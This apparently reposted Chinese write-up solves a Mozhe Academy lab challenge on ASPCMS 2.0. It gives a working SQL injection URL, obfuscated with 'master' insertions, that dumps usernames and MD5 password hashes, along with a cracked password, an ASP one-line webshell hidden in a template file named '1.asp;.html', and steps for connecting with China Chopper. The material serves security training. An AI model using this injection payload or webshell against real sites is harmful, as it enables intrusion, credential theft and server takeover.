1. 程式人生 > 實用技巧 >墨者學院_CMS系統漏洞分析溯源(第4題)

墨者學院_CMS系統漏洞分析溯源(第4題)

靶場:

https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe

背景介紹

ASPCMS是完全開源的一套CMS建站系統,主要面向企業進行快速的建造簡潔,高效,易用,安全的公司企業網站,一般的開發人員就能夠使用本系統以最低的成本、最少的人力投入在最短的時間內架設一個功能齊全、效能優異的公司企業網站。ASPCMS是基於ASP+Access(sql2000)開發的網站內容管理系統。

實訓目標

1.學習登入繞過、cookie欺騙的相關知識;
2.熟悉火狐外掛cookies Manager使用;
3.對程式碼的相關知識瞭解;

解題方向

程式碼審計漏洞,cookie偽造繞過身份鑑別

解題思路:

1、開啟網址,檢視頁面原始碼,發現目標使用aspcms2.0

2、百度aspcms2.0,發現存在注入漏洞,利用payload

/plug/comment/commentList.asp?id=0%20unmasterion%20semasterlect%20top%201%20UserID,GroupID,LoginName,Password,now%28%29,null,1%20%20frmasterom%20{prefix}user

獲取使用者名稱和密碼(密碼是MD5加密後的)

解密:4rfv3edc2wsx1qaz

3、使用使用者名稱密碼登入

4、發現一個介面風格位置,有一個1.asp;.html文字資訊,而裡面也已經寫好了asp一句話木馬

<%eval request("chopper")%>

5、菜刀連線,在C盤下找到key

/Templates/green/html/1.asp;.html